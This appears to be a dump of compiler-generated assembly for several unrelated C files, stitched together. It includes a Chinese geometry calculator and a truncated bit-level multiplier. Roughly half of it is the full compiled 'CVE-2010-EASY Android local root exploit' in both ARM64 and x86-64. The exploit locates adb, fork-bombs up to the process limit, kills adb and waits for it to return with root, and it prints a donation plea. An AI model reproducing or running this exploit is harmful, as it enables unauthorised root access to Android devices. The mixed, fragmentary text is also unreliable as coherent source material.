x29, #8 str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf ldur s0, [x29, #-4] fcvt d0, s0 ldur w9, [x29, #-8] ; implicit-def: $x8 mov x8, x9 mov x9, sp str d0, [x9] str x8, [x9, #8] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf ldur s0, [x29, #-4] fcvt d1, s0 adrp x8, lCPI0_2@PAGE ldr d0, [x8, lCPI0_2@PAGEOFF] fmul d0, d0, d1 mov x8, sp str d0, [x8] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf ldur s0, [x29, #-4] fcvt d1, s0 adrp x8, lCPI0_1@PAGE ldr d0, [x8, lCPI0_1@PAGEOFF] str d0, [sp, #16] ; 8-byte Folded Spill fmul d0, d0, d1 ldur s1, [x29, #-4] fcvt d1, s1 fmul d0, d0, d1 mov x8, sp str d0, [x8] adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf ldur s0, [x29, #-4] fcvt d1, s0 adrp x8, lCPI0_0@PAGE ldr d0, [x8, lCPI0_0@PAGEOFF] fmul d0, d0, d1 ldur s1, [x29, #-4] fcvt d1, s1 fmul d0, d0, d1 mov x8, sp str d0, [x8] adrp x0, l_.str.5@PAGE add x0, x0, l_.str.5@PAGEOFF bl _printf ldr d0, [sp, #16] ; 8-byte Folded Reload ldur s1, [x29, #-4] fcvt d1, s1 fmul d0, d0, d1 ldur s1, [x29, #-4] fcvt d1, s1 fmul d0, d0, d1 ldur s1, [x29, #-4] fcvt d1, s1 fmul d0, d0, d1 mov x8, sp str d0, [x8] adrp x0, l_.str.6@PAGE add x0, x0, l_.str.6@PAGEOFF bl _printf ldr d0, [sp, #16] ; 8-byte Folded Reload ldur s1, [x29, #-4] fcvt d1, s1 fmul d0, d0, d1 ldur s1, [x29, #-4] fcvt d1, s1 fmul d0, d0, d1 ldur s2, [x29, #-8] ; implicit-def: $d1 fmov s1, s2 sshll.2d v1, v1, #0 ; kill: def $d1 killed $d1 killed $q1 scvtf d1, d1 fmul d0, d0, d1 mov x8, sp str d0, [x8] adrp x0, l_.str.7@PAGE add x0, x0, l_.str.7@PAGEOFF bl _printf ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%f" l_.str.1: ; @.str.1 .asciz "%d" l_.str.2: ; @.str.2 .asciz "\345\234\206\345\215\212\345\276\204 r = %.1f\357\274\214\345\234\206\346\237\261\351\253\230 h = %d\n" l_.str.3: ; @.str.3 .asciz "\345\234\206\345\221\250\351\225\277\344\270\272 \t\t%.2f\n" l_.str.4: ; @.str.4 .asciz "\345\234\206\351\235\242\347\247\257\344\270\272 \t\t%.2f\n" l_.str.5: ; @.str.5 .asciz "\345\234\206\347\220\203\350\241\250\351\235\242\347\247\257\344\270\272 \t%.2f\n" l_.str.6: ; @.str.6 .asciz "\345\234\206\347\220\203\344\275\223\347\247\257\344\270\272 \t\t%.2f\n" l_.str.7: ; @.str.7 .asciz "\345\234\206\346\237\261\344\275\223\347\247\257\344\270\272 \t\t%.2f\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .section __TEXT,__literal8,8byte_literals .p2align 3 ## -- Begin function main LCPI0_0: .quad 0x400921fb4d12d84a ## double 3.1415926000000001 LCPI0_1: .quad 0x402921fb4d12d84a ## double 12.5663704 LCPI0_2: .quad 0x401921fb4d12d84a ## double 6.2831852000000001 .section __TEXT,__text,regular,pure_instructions .globl _main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp leaq L_.str(%rip), %rdi leaq -4(%rbp), %rsi movb $0, %al callq _scanf leaq L_.str.1(%rip), %rdi leaq -8(%rbp), %rsi movb $0, %al callq _scanf movss -4(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm0 movl -8(%rbp), %esi leaq L_.str.2(%rip), %rdi movb $1, %al callq _printf movss -4(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm1 movsd LCPI0_2(%rip), %xmm0 ## xmm0 = mem[0],zero mulsd %xmm1, %xmm0 leaq L_.str.3(%rip), %rdi movb $1, %al callq _printf movss -4(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm1 movsd LCPI0_0(%rip), %xmm0 ## xmm0 = mem[0],zero mulsd %xmm1, %xmm0 movss -4(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero cvtss2sd %xmm1, %xmm1 mulsd %xmm1, %xmm0 leaq L_.str.4(%rip), %rdi movb $1, %al callq _printf movss -4(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm1 movsd LCPI0_1(%rip), %xmm0 ## xmm0 = mem[0],zero mulsd %xmm1, %xmm0 movss -4(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero cvtss2sd %xmm1, %xmm1 mulsd %xmm1, %xmm0 leaq L_.str.5(%rip), %rdi movb $1, %al callq _printf movss -4(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm1 movsd LCPI0_0(%rip), %xmm0 ## xmm0 = mem[0],zero mulsd %xmm1, %xmm0 movss -4(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero cvtss2sd %xmm1, %xmm1 mulsd %xmm1, %xmm0 movss -4(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero cvtss2sd %xmm1, %xmm1 mulsd %xmm1, %xmm0 leaq L_.str.6(%rip), %rdi movb $1, %al callq _printf movss -4(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm1 movsd LCPI0_0(%rip), %xmm0 ## xmm0 = mem[0],zero mulsd %xmm1, %xmm0 movss -4(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero cvtss2sd %xmm1, %xmm1 mulsd %xmm1, %xmm0 cvtsi2sdl -8(%rbp), %xmm1 mulsd %xmm1, %xmm0 leaq L_.str.7(%rip), %rdi movb $1, %al callq _printf addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%f" L_.str.1: ## @.str.1 .asciz "%d" L_.str.2: ## @.str.2 .asciz "\345\234\206\345\215\212\345\276\204 r = %.1f\357\274\214\345\234\206\346\237\261\351\253\230 h = %d\n" L_.str.3: ## @.str.3 .asciz "\345\234\206\345\221\250\351\225\277\344\270\272 \t\t%.2f\n" L_.str.4: ## @.str.4 .asciz "\345\234\206\351\235\242\347\247\257\344\270\272 \t\t%.2f\n" L_.str.5: ## @.str.5 .asciz "\345\234\206\347\220\203\350\241\250\351\235\242\347\247\257\344\270\272 \t%.2f\n" L_.str.6: ## @.str.6 .asciz "\345\234\206\347\220\203\344\275\223\347\247\257\344\270\272 \t\t%.2f\n" L_.str.7: ## @.str.7 .asciz "\345\234\206\346\237\261\344\275\223\347\247\257\344\270\272 \t\t%.2f\n" .subsections_via_symbols
the_stack_data/75137905.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
the_stack_data/100140423.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _die ; -- Begin function die .p2align 2 _die: ; @die .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #8] ldr x0, [sp, #8] bl _perror bl ___error ldr w0, [x0] bl _exit .cfi_endproc ; -- End function .globl _find_adb ; -- Begin function find_adb .p2align 2 _find_adb: ; @find_adb .cfi_startproc ; %bb.0: sub sp, sp, #352 .cfi_def_cfa_offset 352 stp x28, x27, [sp, #320] ; 16-byte Folded Spill stp x29, x30, [sp, #336] ; 16-byte Folded Spill add x29, sp, #336 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] str wzr, [sp, #52] str wzr, [sp, #48] str wzr, [sp, #44] str wzr, [sp, #52] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #52] mov w9, #32000 subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_8 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 ldr w9, [sp, #52] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] add x0, sp, #56 str x0, [sp, #32] ; 8-byte Folded Spill mov w1, #0 str w1, [sp, #28] ; 4-byte Folded Spill mov x2, #256 adrp x3, l_.str@PAGE add x3, x3, l_.str@PAGEOFF bl ___sprintf_chk ldr w1, [sp, #28] ; 4-byte Folded Reload ldr x0, [sp, #32] ; 8-byte Folded Reload bl _open str w0, [sp, #48] subs w8, w0, #0 cset w8, ge tbnz w8, #0, LBB1_4 b LBB1_3 LBB1_3: ; in Loop: Header=BB1_1 Depth=1 b LBB1_7 LBB1_4: ; in Loop: Header=BB1_1 Depth=1 add x0, sp, #56 str x0, [sp, #16] ; 8-byte Folded Spill mov w1, #0 mov x2, #256 bl _memset ldr x1, [sp, #16] ; 8-byte Folded Reload ldr w0, [sp, #48] mov x2, #255 bl _read ldr w0, [sp, #48] bl _close ldr x0, [sp, #16] ; 8-byte Folded Reload adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _strstr subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB1_6 b LBB1_5 LBB1_5: ldr w8, [sp, #52] str w8, [sp, #44] b LBB1_8 LBB1_6: ; in Loop: Header=BB1_1 Depth=1 b LBB1_7 LBB1_7: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #52] add w8, w8, #1 str w8, [sp, #52] b LBB1_1 LBB1_8: ldr w8, [sp, #44] str w8, [sp, #12] ; 4-byte Folded Spill ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB1_10 b LBB1_9 LBB1_9: bl ___stack_chk_fail LBB1_10: ldr w0, [sp, #12] ; 4-byte Folded Reload ldp x29, x30, [sp, #336] ; 16-byte Folded Reload ldp x28, x27, [sp, #320] ; 16-byte Folded Reload add sp, sp, #352 ret .cfi_endproc ; -- End function .globl _restart_adb ; -- Begin function restart_adb .p2align 2 _restart_adb: ; @restart_adb .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] ldur w0, [x29, #-4] mov w1, #9 bl _kill ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _wait_for_root_adb ; -- Begin function wait_for_root_adb .p2align 2 _wait_for_root_adb: ; @wait_for_root_adb .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] str wzr, [sp, #8] b LBB3_1 LBB3_1: ; =>This Inner Loop Header: Depth=1 bl _find_adb str w0, [sp, #8] ldr w8, [sp, #8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB3_4 b LBB3_2 LBB3_2: ; in Loop: Header=BB3_1 Depth=1 ldr w8, [sp, #8] ldur w9, [x29, #-4] subs w8, w8, w9 cset w8, eq tbnz w8, #0, LBB3_4 b LBB3_3 LBB3_3: b LBB3_5 LBB3_4: ; in Loop: Header=BB3_1 Depth=1 mov w0, #1 bl _sleep b LBB3_1 LBB3_5: mov w0, #5 bl _sleep mov w0, #-1 mov w1, #9 bl _kill ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #112 .cfi_def_cfa_offset 112 stp x29, x30, [sp, #96] ; 16-byte Folded Spill add x29, sp, #96 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] stur wzr, [x29, #-20] stur w0, [x29, #-24] stur x1, [x29, #-32] stur wzr, [x29, #-36] stur wzr, [x29, #-44] mov w8, #1 str w8, [sp, #48] strb wzr, [sp, #47] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf mov w0, #7 add x1, sp, #24 bl _getrlimit subs w8, w0, #0 cset w8, ge tbnz w8, #0, LBB4_2 b LBB4_1 LBB4_1: adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _die b LBB4_2 LBB4_2: ldr x8, [sp, #24] mov x9, #9223372036854775807 subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB4_4 b LBB4_3 LBB4_3: adrp x0, l_.str.5@PAGE add x0, x0, l_.str.5@PAGEOFF bl _printf mov w0, #1 bl _exit LBB4_4: ldr x10, [sp, #24] ldr x8, [sp, #32] mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.6@PAGE add x0, x0, l_.str.6@PAGEOFF bl _printf adrp x0, l_.str.7@PAGE add x0, x0, l_.str.7@PAGEOFF bl _printf bl _find_adb stur w0, [x29, #-36] ldur w8, [x29, #-36] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB4_6 b LBB4_5 LBB4_5: adrp x0, l_.str.8@PAGE add x0, x0, l_.str.8@PAGEOFF bl _die b LBB4_6 LBB4_6: ldur w9, [x29, #-36] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.9@PAGE add x0, x0, l_.str.9@PAGEOFF bl _printf adrp x0, l_.str.10@PAGE add x0, x0, l_.str.10@PAGEOFF bl _printf adrp x0, l_.str.11@PAGE add x0, x0, l_.str.11@PAGEOFF bl _printf adrp x0, l_.str.12@PAGE add x0, x0, l_.str.12@PAGEOFF bl _printf mov w0, #5 bl _sleep bl _fork subs w8, w0, #0 cset w8, le tbnz w8, #0, LBB4_8 b LBB4_7 LBB4_7: mov w0, #0 bl _exit LBB4_8: bl _setsid sub x0, x29, #16 bl _pipe bl _fork subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB4_19 b LBB4_9 LBB4_9: ldur w0, [x29, #-16] bl _close b LBB4_10 LBB4_10: ; =>This Inner Loop Header: Depth=1 bl _fork stur w0, [x29, #-40] subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB4_12 b LBB4_11 LBB4_11: mov w0, #0 bl _exit LBB4_12: ; in Loop: Header=BB4_10 Depth=1 ldur w8, [x29, #-40] subs w8, w8, #0 cset w8, ge tbnz w8, #0, LBB4_16 b LBB4_13 LBB4_13: ; in Loop: Header=BB4_10 Depth=1 ldr w8, [sp, #48] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB4_15 b LBB4_14 LBB4_14: ; in Loop: Header=BB4_10 Depth=1 ldur w9, [x29, #-44] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.13@PAGE add x0, x0, l_.str.13@PAGEOFF bl _printf str wzr, [sp, #48] ldur w0, [x29, #-12] add x1, sp, #47 mov x2, #1 bl _write ldur w0, [x29, #-12] bl _close b LBB4_15 LBB4_15: ; in Loop: Header=BB4_10 Depth=1 b LBB4_17 LBB4_16: ; in Loop: Header=BB4_10 Depth=1 ldur w8, [x29, #-44] add w8, w8, #1 stur w8, [x29, #-44] b LBB4_17 LBB4_17: ; in Loop: Header=BB4_10 Depth=1 b LBB4_18 LBB4_18: ; in Loop: Header=BB4_10 Depth=1 b LBB4_10 LBB4_19: ldur w0, [x29, #-12] bl _close ldur w0, [x29, #-16] add x1, sp, #47 mov x2, #1 bl _read ldur w0, [x29, #-36] bl _restart_adb bl _fork subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB4_22 b LBB4_20 LBB4_20: bl _fork b LBB4_21 LBB4_21: ; =>This Inner Loop Header: Depth=1 mov w0, #29756 bl _sleep b LBB4_21 LBB4_22: ldur w0, [x29, #-36] bl _wait_for_root_adb ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB4_24 b LBB4_23 LBB4_23: bl ___stack_chk_fail LBB4_24: mov w0, #0 ldp x29, x30, [sp, #96] ; 16-byte Folded Reload add sp, sp, #112 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "/proc/%d/cmdline" l_.str.1: ; @.str.1 .asciz "/sbin/adb" l_.str.2: ; @.str.2 .asciz " CVE-2010-EASY Android local root exploit (C) 2010 by 743C\n\n" l_.str.3: ; @.str.3 .asciz " checking NPROC limit ...\n" l_.str.4: ; @.str.4 .asciz "[-]getrlimit" l_.str.5: ; @.str.5 .asciz "[-] No RLIMIT_NPROC set. Exploit would just crash machine. Exiting.\n" l_.str.6: ; @.str.6 .asciz "[+] RLIMIT_NPROC={%lu, %lu}\n" l_.str.7: ; @.str.7 .asciz " Searching foradb...\n" l_.str.8: ; @.str.8 .asciz "[-] Cannot findadb" l_.str.9: ; @.str.9 .asciz "[+] Foundadbas PID %d\n" l_.str.10: ; @.str.10 .asciz " Spawning children.Donttype anything and wait for reset!\n" l_.str.11: ; @.str.11 .asciz "\n If you like what we are doing you can send us PayPal money to\n [email protected] so we can compensate time, effort and HW costs.\n If you are a company and feel like you profit from our work,\n we also accept donations > 1000 USD!\n" l_.str.12: ; @.str.12 .asciz "\nadbconnection will be reset. restartadbserver on desktop and re-login.\n" l_.str.13: ; @.str.13 .asciz "\n[+] Forked %dchilds.\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _die ## -- Begin function die .p2align 4, 0x90 _die: ## @die .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movq -8(%rbp), %rdi callq _perror callq ___error movl (%rax), %edi callq _exit .cfi_endproc ## -- End function .globl _find_adb ## -- Begin function find_adb .p2align 4, 0x90 _find_adb: ## @find_adb .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $288, %rsp ## imm = 0x120 movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -276(%rbp) movl $0, -280(%rbp) movl $0, -284(%rbp) movl $0, -276(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 cmpl $32000, -276(%rbp) ## imm = 0x7D00 jge LBB1_8 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 leaq -272(%rbp), %rdi movl -276(%rbp), %r8d xorl %esi, %esi movl $256, %edx ## imm = 0x100 leaq L_.str(%rip), %rcx movb $0, %al callq ___sprintf_chk leaq -272(%rbp), %rdi xorl %esi, %esi movb $0, %al callq _open movl %eax, -280(%rbp) cmpl $0, %eax jge LBB1_4 ## %bb.3: ## in Loop: Header=BB1_1 Depth=1 jmp LBB1_7 LBB1_4: ## in Loop: Header=BB1_1 Depth=1 leaq -272(%rbp), %rdi xorl %esi, %esi movl $256, %edx ## imm = 0x100 callq _memset movl -280(%rbp), %edi leaq -272(%rbp), %rsi movl $255, %edx callq _read movl -280(%rbp), %edi callq _close leaq -272(%rbp), %rdi leaq L_.str.1(%rip), %rsi callq _strstr cmpq $0, %rax je LBB1_6 ## %bb.5: movl -276(%rbp), %eax movl %eax, -284(%rbp) jmp LBB1_8 LBB1_6: ## in Loop: Header=BB1_1 Depth=1 jmp LBB1_7 LBB1_7: ## in Loop: Header=BB1_1 Depth=1 movl -276(%rbp), %eax addl $1, %eax movl %eax, -276(%rbp) jmp LBB1_1 LBB1_8: movl -284(%rbp), %eax movl %eax, -288(%rbp) ## 4-byte Spill movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB1_10 ## %bb.9: movl -288(%rbp), %eax ## 4-byte Reload addq $288, %rsp ## imm = 0x120 popq %rbp retq LBB1_10: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .globl _restart_adb ## -- Begin function restart_adb .p2align 4, 0x90 _restart_adb: ## @restart_adb .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl %edi, -4(%rbp) movl -4(%rbp), %edi movl $9, %esi callq _kill addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _wait_for_root_adb ## -- Begin function wait_for_root_adb .p2align 4, 0x90 _wait_for_root_adb: ## @wait_for_root_adb .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl %edi, -4(%rbp) movl $0, -8(%rbp) LBB3_1: ## =>This Inner Loop Header: Depth=1 callq _find_adb movl %eax, -8(%rbp) cmpl $0, -8(%rbp) je LBB3_4 ## %bb.2: ## in Loop: Header=BB3_1 Depth=1 movl -8(%rbp), %eax cmpl -4(%rbp), %eax je LBB3_4 ## %bb.3: jmp LBB3_5 LBB3_4: ## in Loop: Header=BB3_1 Depth=1 movl $1, %edi callq _sleep jmp LBB3_1 LBB3_5: movl $5, %edi callq _sleep movl $4294967295, %edi ## imm = 0xFFFFFFFF movl $9, %esi callq _kill addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $80, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -20(%rbp) movl %edi, -24(%rbp) movq %rsi, -32(%rbp) movl $0, -36(%rbp) movl $0, -44(%rbp) movl $1, -48(%rbp) movb $0, -49(%rbp) leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf movl $7, %edi leaq -72(%rbp), %rsi callq _getrlimit cmpl $0, %eax jge LBB4_2 ## %bb.1: leaq L_.str.4(%rip), %rdi callq _die LBB4_2: movabsq $9223372036854775807, %rax ## imm = 0x7FFFFFFFFFFFFFFF cmpq %rax, -72(%rbp) jne LBB4_4 ## %bb.3: leaq L_.str.5(%rip), %rdi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _printf movl $1, %edi callq _exit LBB4_4: movq -72(%rbp), %rsi movq -64(%rbp), %rdx leaq L_.str.6(%rip), %rdi movb $0, %al callq _printf leaq L_.str.7(%rip), %rdi movb $0, %al callq _printf callq _find_adb movl %eax, -36(%rbp) cmpl $0, -36(%rbp) jne LBB4_6 ## %bb.5: leaq L_.str.8(%rip), %rdi callq _die LBB4_6: movl -36(%rbp), %esi leaq L_.str.9(%rip), %rdi movb $0, %al callq _printf leaq L_.str.10(%rip), %rdi movb $0, %al callq _printf leaq L_.str.11(%rip), %rdi movb $0, %al callq _printf leaq L_.str.12(%rip), %rdi movb $0, %al callq _printf movl $5, %edi callq _sleep callq _fork cmpl $0, %eax jle LBB4_8 ## %bb.7: xorl %edi, %edi callq _exit LBB4_8: callq _setsid leaq -16(%rbp), %rdi callq _pipe callq _fork cmpl $0, %eax jne LBB4_19 ## %bb.9: movl -16(%rbp), %edi callq _close LBB4_10: ## =>This Inner Loop Header: Depth=1 callq _fork movl %eax, -40(%rbp) cmpl $0, %eax jne LBB4_12 ## %bb.11: xorl %edi, %edi callq _exit LBB4_12: ## in Loop: Header=BB4_10 Depth=1 cmpl $0, -40(%rbp) jge LBB4_16 ## %bb.13: ## in Loop: Header=BB4_10 Depth=1 cmpl $0, -48(%rbp) je LBB4_15 ## %bb.14: ## in Loop: Header=BB4_10 Depth=1 movl -44(%rbp), %esi leaq L_.str.13(%rip), %rdi movb $0, %al callq _printf movl $0, -48(%rbp) movl -12(%rbp), %edi leaq -49(%rbp), %rsi movl $1, %edx callq _write movl -12(%rbp), %edi callq _close LBB4_15: ## in Loop: Header=BB4_10 Depth=1 jmp LBB4_17 LBB4_16: ## in Loop: Header=BB4_10 Depth=1 movl -44(%rbp), %eax addl $1, %eax movl %eax, -44(%rbp) LBB4_17: ## in Loop: Header=BB4_10 Depth=1 jmp LBB4_18 LBB4_18: ## in Loop: Header=BB4_10 Depth=1 jmp LBB4_10 LBB4_19: movl -12(%rbp), %edi callq _close movl -16(%rbp), %edi leaq -49(%rbp), %rsi movl $1, %edx callq _read movl -36(%rbp), %edi callq _restart_adb callq _fork cmpl $0, %eax jne LBB4_22 ## %bb.20: callq _fork LBB4_21: ## =>This Inner Loop Header: Depth=1 movl $29756, %edi ## imm = 0x743C callq _sleep jmp LBB4_21 LBB4_22: movl -36(%rbp), %edi callq _wait_for_root_adb movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB4_24 ## %bb.23: xorl %eax, %eax addq $80, %rsp popq %rbp retq LBB4_24: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "/proc/%d/cmdline" L_.str.1: ## @.str.1 .asciz "/sbin/adb" L_.str.2: ## @.str.2 .asciz " CVE-2010-EASY Android local root exploit (C) 2010 by 743C\n\n" L_.str.3: ## @.str.3 .asciz " checking NPROC limit ...\n" L_.str.4: ## @.str.4 .asciz "[-]getrlimit" L_.str.5: ## @.str.5 .asciz "[-] No RLIMIT_NPROC set. Exploit would just crash machine. Exiting.\n" L_.str.6: ## @.str.6 .asciz "[+] RLIMIT_NPROC={%lu, %lu}\n" L_.str.7: ## @.str.7 .asciz " Searching foradb...\n" L_.str.8: ## @.str.8 .asciz "[-] Cannot findadb" L_.str.9: ## @.str.9 .asciz "[+] Foundadbas PID %d\n" L_.str.10: ## @.str.10 .asciz " Spawning children.Donttype anything and wait for reset!\n" L_.str.11: ## @.str.11 .asciz "\n If you like what we are doing you can send us PayPal money to\n [email protected] so we can compensate time, effort and HW costs.\n If you are a company and feel like you profit from our work,\n we also accept donations > 1000 USD!\n" L_.str.12: ## @.str.12 .asciz "\nadbconnection will be reset. restartadbserver on desktop and re-login.\n" L_.str.13: ## @.str.13 .asciz "\n[+] Forked %dchilds.\n" .subsections_via_symbols
the_stack_data/111079019.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _mul8_089 ; -- Begin function mul8_089 .p2align 2 _mul8_089: ; @mul8_089 .cfi_startproc ; %bb.0: sub sp, sp, #160 .cfi_def_cfa_offset 160 strb w0, [sp, #159] strb w1, [sp, #158] strh wzr, [sp, #156] ldrb w8, [sp, #159] asr w8, w8, #0 and w8, w8, #0x1 strb w8, [sp, #155] ldrb w8, [sp, #159] asr w8, w8, #1 and w8, w8, #0x1 strb w8, [sp, #154] ldrb w8, [sp, #159] asr w8, w8, #2 and w8, w8, #0x1 strb w8, [sp, #153] ldrb w8, [sp, #159] asr w8, w8, #3 and w8, w8, #0x1 strb w8, [sp, #152] ldrb w8, [sp, #159] asr w8, w8, #4 and w8, w8, #0x1 strb w8, [sp, #151] ldrb w8, [sp, #159] asr w8, w8, #5 and w8, w8, #0x1 strb w8, [sp, #150] ldrb w8, [sp, #159] asr w8, w8, #6 and w8, w8, #0x1 strb w8, [sp, #149] ldrb w8, [sp, #159] asr w8, w8, #7 and w8, w8, #0x1 strb w8, [sp, #148] ldrb w8, [sp, #158] asr w8, w8, #0 and w8, w8, #0x1 strb w8, [sp, #147] ldrb w8, [sp, #158] asr w8, w8, #1 and w8, w8, #0x1 strb w8, [sp, #146] ldrb w8, [sp, #158] asr w8, w8, #2 and w8, w8, #0x1 strb w8, [sp, #145] ldrb w8, [sp, #158] asr w8, w8, #3 and w8, w8, #0x1 strb w8, [sp, #144] ldrb w8, [sp, #158] asr w8, w8, #4 and w8, w8, #0x1 strb w8, [sp, #143] ldrb w8, [sp, #158] asr w8, w8, #5 and w8, w8, #0x1 strb w8, [sp, #142] ldrb w8, [sp, 